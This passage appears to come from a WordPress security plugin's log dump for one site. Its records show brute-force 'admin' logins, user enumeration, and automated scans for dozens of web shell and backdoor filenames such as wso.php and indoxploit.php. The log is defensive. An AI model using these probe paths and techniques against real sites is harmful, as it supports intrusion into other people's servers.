login.php'),('67.205.12.218',1137511642,'admin',0,1636820636.6447,7,'qkdrojw2nZQ8em3iCtcMVvKf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.110.251',2650107643,'admin',0,1636821294.7426,7,'KZEiJ2YcHfolAugUIFkeOVDL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.144.126.104',2727378536,'admin',0,1636821960.0881,7,'W9CIqwc3xyDtEM1dBTefjulP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.160.121.111',782268783,'admin',0,1636823207.7421,7,'fV5FWvi1lqOHuxUTyPR3eh6L','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.131.167.46',1753458478,'admin',0,1636823745.0693,7,'BbH6CnRTsGquli0Lv9O4DrPW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('122.170.98.32',2057986592,'admin',0,1636824283.1384,7,'5FWxUXvCiMS0hj2OJK4Ganel','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('31.192.208.12',532729868,'admin',0,1636824880.0868,7,'QkHuzsCxf2YWXOTiyvqla5pc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.152.139',2917963915,'admin',0,1636825457.8424,7,'l4wNzeCJ6fqtG0IP1DKWF3mg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('207.154.254.58',3483041338,'admin',0,1636826012.4387,7,'5hI2kcUXRivKF6Tseajwbngl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1636827320.6848,7,'mTjIoXY7cJxLZUhqpAe6EbnG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.73.217.204',2991184332,'admin',0,1636828789.8528,7,'T41BUzulYI6sKGqd9hPv2grX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.168.174.187',1755885243,'',0,1636830922.1283,70,'GOHVtiejUsvT5fqMpnJuRdA3','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.168.174.187',1755885243,'',0,1636830972.2057,70,'8hWgH4TP0CA3KJUcz5ivZLEx','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('74.214.24.238',1255545070,'admin',0,1636831804.7253,7,'1mn2gBrj7KPdylUhD4kx8YTi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.106',1364735082,'admin',0,1636833227.6938,7,'1G3SatA4ihPbZg27KMduRBJU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.173.84.179',1806521523,'admin',0,1636834689.3622,7,'a2GbRfMnhQS5DYKIUg0OAc8q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.190.95',2813115999,'admin',0,1636836044.0150,7,'ZBjz654TcN3CblMfrdGgUWPY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.189.177.98',96317794,'admin',0,1636837419.3778,7,'kdQpVx7MaG0AJbm3KLDSX5H9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1636838637.2275,55,'eIOUGZp65jCNaxEPo49yViFt','','19|0|0|0|ashbooks.co.uk/wp-includes/wp-class.php'),('45.158.15.146',765333394,'',0,1636838637.2371,55,'dIZrbz9mwkH1GgDt8nRc70xX','','19|0|0|0|ashbooks.co.uk/wp-class.php'),('173.236.168.109',2917967981,'admin',0,1636838731.8791,7,'FVekAIYwxWyRPXJUZ97bLsqz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('87.106.124.62',1466596414,'',0,1636839693.6393,55,'MymYZoPlnDatjQs1VIW8pu07','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('93.115.79.153',1567838105,'admin',0,1636840319.0783,7,'N29SELApqzkB0jQwVPfoma3W','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.1.209.37',50450725,'admin',0,1636841942.9302,7,'TEM0bo6sePVtdSFwgBGL85Ox','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.51.127.28',3140714268,'admin',0,1636843531.9687,7,'syaZFXIGYiVNcTgdhkzQUWto','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1636845121.8524,7,'aBI73AzFrjXQZJgcGTiRC9SV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.201.42.236',3284740844,'admin',0,1636846578.6391,7,'jmNC6MQtZH0yUpeJl4DkLWnY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.132.101',1920435301,'',0,1636848990.3642,55,'K3CWb5TwcUgQqlavDk7B0I6n','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('67.205.36.137',1137517705,'admin',0,1636849499.6408,7,'NcbW0VQv7FD2k4IRPwpoiE8y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.15.239',2703429615,'admin',0,1636851059.4817,7,'3fawlQcFqUzK1gmAdxy947Hs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.255.112.220',2919198940,'admin',0,1636852629.4518,7,'U3gqGEmOTDpjln62FxIeHcYs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.114.47.166',343027622,'',0,1636853206.7133,55,'hQWxKF7GO4S1BvnXdIaCz8mg','','19|0|0|0|ashbooks.co.uk/wp-includes/css/modules.php'),('20.114.47.166',343027622,'',0,1636853208.0414,55,'71dpGWw9BlH85sZaCizMyjSY','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.114.47.166',343027622,'',0,1636853209.3855,55,'FmE6hpjMaIdCBfX8ZDg01Kxy','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/upspy/index.php'),('20.114.47.166',343027622,'',0,1636853210.7146,55,'lLgiqrNDYIbcBw76F5RP3vs0','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/index.php'),('20.114.47.166',343027622,'',0,1636853212.1159,55,'ehfCzs6Oxaw21tpR5ZHKmucT','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.114.47.166',343027622,'',0,1636853212.1480,10,'ehfCzs6Oxaw21tpR5ZHKmucT','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.114.47.166',343027622,'',0,1636853213.4774,100,'OxmLy5J1S9lBiqTunW6DsN7r','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/xichang/x.php'),('20.114.47.166',343027622,'',0,1636853216.3062,55,'vpDi9ORGmtQJoMz3rYByFwHZ','','19|0|0|0|ashbooks.co.uk/wp-admin/shapes.php'),('20.114.47.166',343027622,'',0,1636853217.6493,55,'B6ZDAUrweT1OJEF4CISGH57m','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.114.47.166',343027622,'',0,1636853219.0338,55,'TBgoNhG9brXkEs7Wwyt46FJx','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.114.47.166',343027622,'',0,1636853221.7687,55,'BIcTWXYCjEqhlisvdt3SFnxD','','19|0|0|0|ashbooks.co.uk/up.php'),('20.114.47.166',343027622,'',0,1636853223.1230,55,'lAZ9fry5iqBnIkd6sQP47CUO','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.114.47.166',343027622,'',0,1636853226.3244,55,'4kZA7SNwfQuOK5BGdjiWzsXT','','19|0|0|0|ashbooks.co.uk/shell.php'),('20.114.47.166',343027622,'',0,1636853227.9223,55,'CIc3wyVgY7mU5nQEXP2uxibA','','19|0|0|0|ashbooks.co.uk/wp-admin/network/wp-footer.php'),('20.114.47.166',343027622,'',0,1636853229.2619,55,'mu2E9LvO54atn1qfyizUbx76','','19|0|0|0|ashbooks.co.uk/wp-info.php'),('20.114.47.166',343027622,'',0,1636853230.6143,55,'5hPlzgcRiDE2NB9vsF4qJdwf','','19|0|0|0|ashbooks.co.uk/wp-content/vuln.php'),('20.114.47.166',343027622,'',0,1636853232.3209,55,'ZuwriLt7yMn2OITfCl3kWh1e','','19|0|0|0|ashbooks.co.uk/upel.php'),('20.114.47.166',343027622,'',0,1636853234.4803,55,'GtRYQju4ngKBUmvFCk75Dxad','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ppus/up.php'),('20.114.47.166',343027622,'',0,1636853235.7927,55,'kUiDKhbMvf9VzQX6w1pt5CjS','','19|0|0|0|ashbooks.co.uk/098.php'),('20.114.47.166',343027622,'',0,1636853237.1301,55,'z6w2PtByfEWXojNsCrKaT7hD','','19|0|0|0|ashbooks.co.uk/V5.php'),('20.114.47.166',343027622,'',0,1636853238.4804,55,'4AroY0N1s3wxlUyPqaGtuFcp','','19|0|0|0|ashbooks.co.uk/new_license.php'),('20.114.47.166',343027622,'',0,1636853239.7526,55,'szHqXCZLGuIcRUE1xgWB8ekn','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php'),('20.114.47.166',343027622,'',0,1636853241.0721,55,'xdQOGicVquyLl4nBJHo1D78X','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php'),('20.114.47.166',343027622,'',0,1636853242.4089,55,'TBnuRtJMZDHlboQI9Yqk2z3P','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.114.47.166',343027622,'',0,1636853243.8052,55,'7rN2kIda9W5mnFGO8icwpSoh','','19|0|0|0|ashbooks.co.uk/modules/modules/modules.php'),('20.114.47.166',343027622,'',0,1636853245.1263,55,'UILSuOHrD1ka4JQNY7K3hFTx','','19|0|0|0|ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php'),('20.114.47.166',343027622,'',0,1636853246.4710,55,'siKNgSOVXlIo2hk09eW6bYd5','','19|0|0|0|ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php'),('20.114.47.166',343027622,'',0,1636853248.0944,55,'ceEUBnTX6Z904jVQ31sdYGIv','','19|0|0|0|ashbooks.co.uk/libraries/joomla/css.php'),('20.114.47.166',343027622,'',0,1636853249.3982,100,'uBMj57GevDgOLzPsfkTYK96w','','13|0|0|0|ashbooks.co.uk/libraries/joomla/jmails.php'),('20.114.47.166',343027622,'',0,1636853251.3291,100,'LM1HQ78puTWA0fiBlGKteOja','','13|0|0|0|ashbooks.co.uk/libraries/joomla/jmail.php'),('20.114.47.166',343027622,'',0,1636853252.6518,55,'qaTOeJFzCx8ZcA5QD1GpnfEB','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('20.114.47.166',343027622,'',0,1636853255.4102,55,'PODE6ebnMqNclvY95w2AJdaj','','19|0|0|0|ashbooks.co.uk/tmp/vuln.php'),('20.114.47.166',343027622,'',0,1636853257.4334,55,'iXCBA9H3jD2PKZfF6d5cGJve','','19|0|0|0|ashbooks.co.uk/XxX.php'),('20.114.47.166',343027622,'',0,1636853259.5117,55,'b2vHfGjx30yYneDLBtrEJadq','','19|0|0|0|ashbooks.co.uk/Marvins.php'),('20.114.47.166',343027622,'',0,1636853260.8676,100,'cZ7asuN0HUfpTM1XkCzyYm2n','','13|0|0|0|ashbooks.co.uk/rxr.php'),('20.114.47.166',343027622,'',0,1636853262.2122,55,'c9MIRfmgQ48xykj3sOBKGAzS','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.114.47.166',343027622,'',0,1636853263.9555,55,'HQ7eo6jMxkRWyTNwnlZVpBOh','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.114.47.166',343027622,'',0,1636853265.2890,55,'LKDufobN38CR1MEO4B7PTW9V','','19|0|0|0|ashbooks.co.uk/error.php'),('20.114.47.166',343027622,'',0,1636853266.8743,55,'jcb7eV3P8izRZHnBtvTmsruS','','19|0|0|0|ashbooks.co.uk/RxR.php'),('20.114.47.166',343027622,'',0,1636853268.3164,55,'k7hHCXox8gWGcJaKETArRbIf','','19|0|0|0|ashbooks.co.uk/components/com_b2jcontact/izoc.php'),('20.114.47.166',343027622,'',0,1636853269.7986,55,'8F62zKPamnU1i3AklGdSHcts','','19|0|0|0|ashbooks.co.uk/V3.php'),('20.114.47.166',343027622,'',0,1636853271.4553,55,'29WLAIZQRDeySv8oHJ0laYVf','','19|0|0|0|ashbooks.co.uk/V5.php'),('20.114.47.166',343027622,'',0,1636853274.3709,55,'8LQN3RUIDvl4KgOx07TuVMsH','','19|0|0|0|ashbooks.co.uk/up.php'),('20.114.47.166',343027622,'',0,1636853276.1408,55,'MsSbukC625WJh03P8t1EFT9q','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.114.47.166',343027622,'',0,1636853277.5953,55,'Jfgd4IF3XCcZlG8UPkMLoKbx','','19|0|0|0|ashbooks.co.uk/shell.php'),('20.114.47.166',343027622,'',0,1636853278.9847,55,'za4h9vI6OCfEZequHLXT2kxU','','19|0|0|0|ashbooks.co.uk/administrator/templates/bluestork/index.php'),('20.114.47.166',343027622,'',0,1636853280.3431,55,'2arxRykYNXHl9EKnAP8sTmDV','','19|0|0|0|ashbooks.co.uk/administrator/templates/bluestork/error.php'),('20.114.47.166',343027622,'',0,1636853282.0997,55,'k3BLJWtjdUZpruxsvNyq5hEA','','19|0|0|0|ashbooks.co.uk/administrator/templates/hathor/index.php'),('20.114.47.166',343027622,'',0,1636853283.7562,55,'l2kW819ADa3gN0fVUiXMZCRu','','19|0|0|0|ashbooks.co.uk/administrator/templates/hathor/error.php'),('20.114.47.166',343027622,'',0,1636853285.1741,55,'2ftZgaj9DdbYmH7nhCPUATsL','','19|0|0|0|ashbooks.co.uk/administrator/templates/isis/index.php'),('20.114.47.166',343027622,'',0,1636853286.4956,55,'3YaELAJkRh59jHlpUgsZm12W','','19|0|0|0|ashbooks.co.uk/administrator/templates/isis/error.php'),('20.114.47.166',343027622,'',0,1636853288.0800,55,'lOHd4w7cENLGz3xs1AFkQKYC','','19|0|0|0|ashbooks.co.uk/templates/beez/index.php'),('20.114.47.166',343027622,'',0,1636853289.3958,55,'4lXPga37vOShtYG5KbBUAorx','','19|0|0|0|ashbooks.co.uk/templates/ja_purity/index.php'),('20.114.47.166',343027622,'',0,1636853290.7433,55,'o2UJvL5kqmly3sOijWPSREB6','','19|0|0|0|ashbooks.co.uk/templates/rhuk_milkyway/index.php'),('20.114.47.166',343027622,'',0,1636853292.1204,55,'J4IvjBeyUoWdzwf3GhMc9T5X','','19|0|0|0|ashbooks.co.uk/templates/system/index.php'),('20.114.47.166',343027622,'',0,1636853294.0115,55,'cq5uCjx9URg6nHMWGvPwLpsN','','19|0|0|0|ashbooks.co.uk/templates/system/error.php'),('20.114.47.166',343027622,'',0,1636853295.7609,55,'s07BY2JZPudVg5XLt3bS1koR','','19|0|0|0|ashbooks.co.uk/templates/beez3/index.php'),('20.114.47.166',343027622,'',0,1636853297.2459,55,'hIVXUBlCRMOD0Er4Zju2zqcG','','19|0|0|0|ashbooks.co.uk/templates/beez3/error.php'),('20.114.47.166',343027622,'',0,1636853298.9447,55,'riUGbm0y5DaKeCqH4RsfLjAF','','19|0|0|0|ashbooks.co.uk/templates/beez5/index.php'),('20.114.47.166',343027622,'',0,1636853300.5095,55,'nAyCdYfSZbL1uXaUvglBwI90','','19|0|0|0|ashbooks.co.uk/templates/beez5/error.php'),('20.114.47.166',343027622,'',0,1636853301.8865,55,'OZXezt0nUpSsvN3qQCRl5MGW','','19|0|0|0|ashbooks.co.uk/templates/beez_20/index.php'),('20.114.47.166',343027622,'',0,1636853303.4864,55,'SW621qHbi9pVQuzx07tPFnID','','19|0|0|0|ashbooks.co.uk/templates/beez_20/error.php'),('20.114.47.166',343027622,'',0,1636853304.7440,55,'gs9QuXmC3zqfSxPjVoIkrWcR','','19|0|0|0|ashbooks.co.uk/templates/protostar/index.php'),('20.114.47.166',343027622,'',0,1636853306.2747,55,'ZMur6efDY1L8JIEoc5bnVUqv','','19|0|0|0|ashbooks.co.uk/templates/protostar/error.php'),('20.114.47.166',343027622,'',0,1636853307.8931,55,'ZQi5OVvA1uEMmJrh2o3qlYKD','','19|0|0|0|ashbooks.co.uk/templates/atomic/index.php'),('20.114.47.166',343027622,'',0,1636853309.5360,55,'H4GFhcxuNYa7lEZeIsMoJRCn','','19|0|0|0|ashbooks.co.uk/templates/atomic/error.php'),('20.114.47.166',343027622,'',0,1636853311.3593,55,'H5SF6moUMuyvBxeAp1GJnIql','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.114.47.166',343027622,'',0,1636853312.9078,55,'nrE2wvHQtOBjedSFCbMolyUf','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.114.47.166',343027622,'',0,1636853314.6473,55,'EFqPedftS1Vks3oX6cxbNGlI','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.114.47.166',343027622,'',0,1636853316.1524,55,'0YD4UEtBpxro7QhTysIKdlJV','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.114.47.166',343027622,'',0,1636853333.5488,55,'m4g306KkHO2Rlo5j7dBhqTDi','','19|0|0|0|ashbooks.co.uk/up.php'),('20.114.47.166',343027622,'',0,1636853334.9271,55,'1ujxF4RMUV8o7EqQbKcAtXG2','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.114.47.166',343027622,'',0,1636853336.7176,55,'czRLMi59fwDBskF6KoIxX8WA','','19|0|0|0|ashbooks.co.uk/shell.php'),('13.52.107.99',221539171,'admin',0,1636854179.6645,7,'zhB7CQ39yqo6DLPjFe8MvnOU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('146.148.96.32',2459197472,'admin',0,1636855680.3513,7,'JiRbcYewhPVlBxSsgMO4N2DL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.216.208.32',1608044576,'admin',0,1636857162.5671,7,'VTmfebRgHK7rx2q50DMuvlOy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.73.217.204',2991184332,'admin',0,1636858726.0286,7,'LPRmQgDeoxphCiu4sTVSBnMY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.9.91.103',2953403239,'admin',0,1636860331.4975,7,'g2X8Q5FZRJue1pjmvaPVUSiN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.205',1364735181,'admin',0,1636861942.5413,7,'ORoptBh753TGUnlybdrxHXci','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.202.172.247',1389014263,'admin',0,1636863545.5640,7,'rWi43851sGYPUQekCmpvBK29','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('151.106.55.242',2540320754,'',0,1636865474.8501,70,'rx34gozLEjTmsRWNYyeKaSpn','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('220.167.101.24',3701957912,'admin',0,1636866750.8355,7,'38pRMsEhvOiHXyLUIdJl4Yoa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.121.222.87',578412119,'admin',0,1636868351.7282,7,'Tt4REd3ryv9FHPsMnmWGYg2e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.161.27.142',782310286,'',0,1636869290.5107,70,'emTLask39wvKGIxgBXQzqiAn','','0|0|0|0|ashbooks.co.uk/'),('46.161.27.142',782310286,'',0,1636869290.8286,70,'7zIvi0ZmgqrT6AyQleSjJfG9','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('46.161.27.142',782310286,'admin',0,1636869291.4514,7,'kvXabOuZ1pzhPBwWKiyfENoH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.9.91.103',2953403239,'admin',0,1636869951.6940,7,'CHpLgSXOPDys3IWbFh2AjoY4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.36.118.233',3240392425,'',0,1636871128.3891,70,'9VnaRDkYTUxOw7F82BKZXfbs','','0|0|0|0|ashbooks.co.uk/'),('193.36.118.233',3240392425,'',0,1636871129.0951,70,'FCXZTaHA7wbM9P4y1ehgWVsv','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('193.36.118.233',3240392425,'admin',0,1636871130.4155,7,'3hSdEPLs9BHRY2GTfb1yj0ei','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.75.15.189',860557245,'admin',0,1636871588.3414,7,'eYcguQo5bBI1249nlONZTzX7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('13.210.201.156',231917980,'admin',0,1636873347.9038,7,'RqaBvoZ37nkYVJP6sXrltAFK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('68.183.108.18',1152871442,'admin',0,1636876746.4040,7,'DAZBGeqIC7OyP4ajcf9MVLXb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.175.147',2813112211,'admin',0,1636878352.4253,7,'Vb6wof7guGnPyvES8dWL594m','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.232.79',1168369743,'admin',0,1636879923.0285,7,'PmsdaoTL3yf6xEU5wg7vHJGb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.160.121.111',782268783,'admin',0,1636881708.8689,7,'MXx2CTgksGSOZPaJUBV1oqEv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('39.100.228.235',660923627,'admin',0,1636883036.9353,152,'F30aO8MpWVjvGd7RuyLQE5ZS','','0|0|0|0|ashbooks.co.uk/xmlrpc.php'),('167.172.153.166',2813106598,'admin',0,1636883764.2393,7,'ExsGS1FhJjMIXOZUuif0vLT3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.95.172',2650103724,'admin',0,1636885619.2118,7,'dTsEHMI1AgLo0Cu29bVaFRhZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.68',3103917124,'admin',0,1636889660.5370,7,'K0qYFrhp4D63CyERTeGWuwns','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.109.14.213',1500319445,'admin',0,1636891631.8726,7,'UXDJjVo04luKPyInpTAqLHgQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('18.116.121.27',309623067,'admin',0,1636893481.1704,7,'WqQkFPrJdg26ZfzUMp9hV1BY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.175.147',2813112211,'admin',0,1636896774.0125,7,'v2BDexMbG1XI84tFuhZCogYj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.101.26.42',778377770,'admin',0,1636897590.0423,7,'vHo8pgf1byAiCDUYqrMJOlzw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.101.26.42',778377770,'admin',0,1636898388.5235,7,'MwEnbLmx2YCTUP4KfD05zrjH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.109.28.1',1735203841,'admin',0,1636900057.5846,7,'P5yiGQxZ6wBAmzLb0IHDWsen','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.151.91',2813106011,'admin',0,1636900773.3514,7,'PFcx9v3kAuLDytUZQ7IKRWnh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.93.36.100',576529508,'admin',0,1636901463.6952,7,'kRTJqzB2uLpNfvtQl35iDjMy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.198.1.26',1757806874,'admin',0,1636902182.1778,7,'GJjsRCgKhBIzuUQfEXV43xbO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.9.143.94',3641282398,'admin',0,1636903767.8633,7,'FOdrJcbCZtjAuXVfGpE15D9w','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('148.72.214.245',2487801589,'admin',0,1636904570.8845,7,'qVlDCOwnj6oLAvXEU3WkY24g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.91.68.146',2421900434,'admin',0,1636905347.1745,7,'3KzkTxujnUeilX9WcrfJFo1Q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.115.136',2335929224,'admin',0,1636906216.7223,7,'nGXRK3pBEWcJ5VjIQ982ZsAm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.129.168',3468525992,'admin',0,1636907022.0551,7,'iHpERkOmAhuYlUZq4ebMrgfj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.139.182',3468528566,'admin',0,1636907838.9341,7,'8fD2Wjmvs1QbeAMdUO5w9VHR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.175',1364735151,'admin',0,1636908563.4472,7,'X1a36DIwQqyME8ZGkpPcUzTf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.180.73.192',1806977472,'admin',0,1636909292.1570,7,'5oIFQnUwyxsf8NJzLlSEZHVt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.106.180.170',342537386,'',0,1636909532.0414,70,'F0jKdfcRn4SxMtkZr1zVqNOs','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('196.117.2.219',3296002779,'',0,1636909981.2396,55,'xjCzFlpUbhIuOydAorf4evn3','','19|0|0|0|ashbooks.co.uk/leaf.php'),('196.117.2.219',3296002779,'',0,1636909984.9220,55,'4ILKH9rA1Qs28MF7OGf6R3hi','','19|0|0|0|ashbooks.co.uk/alex.php'),('196.117.2.219',3296002779,'',0,1636909985.5567,55,'lJWEMISpXj1cn3qaigRPDUGr','','19|0|0|0|ashbooks.co.uk/mailer.php'),('196.117.2.219',3296002779,'',0,1636909986.1741,55,'ovG7yXCS8ZMTDBckj60aVhQw','','19|0|0|0|ashbooks.co.uk/anone.php'),('196.117.2.219',3296002779,'',0,1636909987.0342,55,'LfnGTXIqgcF6k0Y8HdjEuMWZ','','19|0|0|0|ashbooks.co.uk/a.php'),('196.117.2.219',3296002779,'',0,1636909987.0577,10,'LfnGTXIqgcF6k0Y8HdjEuMWZ','','707|0|0|0|ashbooks.co.uk/a.php'),('196.117.2.219',3296002779,'',0,1636909987.8776,55,'WuigehVdz9JEPOQfAxy3L04M','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('196.117.2.219',3296002779,'',0,1636909988.7382,55,'odcM2i7L1xkGQYAhf8yp3CbD','','19|0|0|0|ashbooks.co.uk/alfa.php'),('196.117.2.219',3296002779,'',0,1636909989.8929,55,'x2z8pW5BPgIrA4b3doHO1aJZ','','19|0|0|0|ashbooks.co.uk/wso.php'),('196.117.2.219',3296002779,'',0,1636909990.9502,55,'DlinCIQVFmroxHPRvG367swz','','19|0|0|0|ashbooks.co.uk/c.php'),('196.117.2.219',3296002779,'',0,1636909991.9575,55,'Llnh3zXWbpgANHJT4tdIs5Fi','','19|0|0|0|ashbooks.co.uk/1.php'),('196.117.2.219',3296002779,'',0,1636909993.6165,55,'YwTjqyah9KRs7V6XOGt8CZd5','','19|0|0|0|ashbooks.co.uk/send.php'),('196.117.2.219',3296002779,'',0,1636909994.4000,55,'0bjs8iXZHqTOYdvcINpa3f6n','','19|0|0|0|ashbooks.co.uk/3.php'),('196.117.2.219',3296002779,'',0,1636909995.6875,55,'JI6f0oZhtwRLTBNPFUY58i3y','','19|0|0|0|ashbooks.co.uk/404.php'),('196.117.2.219',3296002779,'',0,1636909996.2846,55,'nZG1wrpaYFIBDCs5Tze4Kghc','','19|0|0|0|ashbooks.co.uk/sym.php'),('196.117.2.219',3296002779,'',0,1636909997.4206,55,'9gJKftE0iO4peWXL5jzaFY2v','','19|0|0|0|ashbooks.co.uk/wp-confirm.php'),('196.117.2.219',3296002779,'',0,1636909998.3197,55,'oxce6VFyRkPNultO84LEvfB5','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('196.117.2.219',3296002779,'',0,1636909999.4144,55,'uyjkVp9S5ndD2aCGA6Y70mNf','','19|0|0|0|ashbooks.co.uk/dr.php'),('196.117.2.219',3296002779,'',0,1636910000.6436,55,'90tpeFwo6KXUiPgLyORfBnhI','','19|0|0|0|ashbooks.co.uk/upload.php'),('196.117.2.219',3296002779,'',0,1636910001.5866,55,'ia045btve71kg8DcrCFQsM2n','','19|0|0|0|ashbooks.co.uk/bypass.php'),('196.117.2.219',3296002779,'',0,1636910002.2957,55,'dcTxigBoAS7jhNfKRPZVLs6G','','19|0|0|0|ashbooks.co.uk/wp-blog.php'),('196.117.2.219',3296002779,'',0,1636910003.2672,55,'32wMCnjh6SvrmpTzcWDGKIug','','19|0|0|0|ashbooks.co.uk/data.php'),('196.117.2.219',3296002779,'',0,1636910005.1606,55,'4lb79TcBGwNPmfUheCE8rjLq','','19|0|0|0|ashbooks.co.uk/owl.php'),('196.117.2.219',3296002779,'',0,1636910007.4958,55,'iByjV0GF39eIQoScsDg48aJu','','19|0|0|0|ashbooks.co.uk/vuln.php'),('196.117.2.219',3296002779,'',0,1636910009.0649,55,'o6mVCZTzbF3DaNRLJi4GMxKf','','19|0|0|0|ashbooks.co.uk/symlink.php'),('196.117.2.219',3296002779,'',0,1636910010.7436,55,'agFWAc4CRHzTLv8i3Vl0PByZ','','19|0|0|0|ashbooks.co.uk/ohayo.php'),('196.117.2.219',3296002779,'',0,1636910011.8908,55,'TOsVeoCbqGxkAgLthSYNUIZ1','','19|0|0|0|ashbooks.co.uk/100.php'),('196.117.2.219',3296002779,'',0,1636910013.1757,55,'9fBaHkwELy2CUTXF3GK8PJnQ','','19|0|0|0|ashbooks.co.uk/777.php'),('196.117.2.219',3296002779,'',0,1636910014.8286,55,'Z1rj8L4xg9XT2epCQvhWtPzq','','19|0|0|0|ashbooks.co.uk/wp-content/wp-logins.php'),('196.117.2.219',3296002779,'',0,1636910015.8392,55,'5kQXtYMJP9V0RAWaB8bjshGm','','19|0|0|0|ashbooks.co.uk/1index.php'),('196.117.2.219',3296002779,'',0,1636910016.8086,55,'GMEnASPuqjTZXyUNQeBbc04z','','19|0|0|0|ashbooks.co.uk/wp-wso.php'),('196.117.2.219',3296002779,'',0,1636910017.7935,55,'6ndrfMywJO35BciTpjZg1los','','19|0|0|0|ashbooks.co.uk/2index.php'),('196.117.2.219',3296002779,'',0,1636910018.9277,55,'w9DWcGOkpeHUMNLoCYhtbm6d','','19|0|0|0|ashb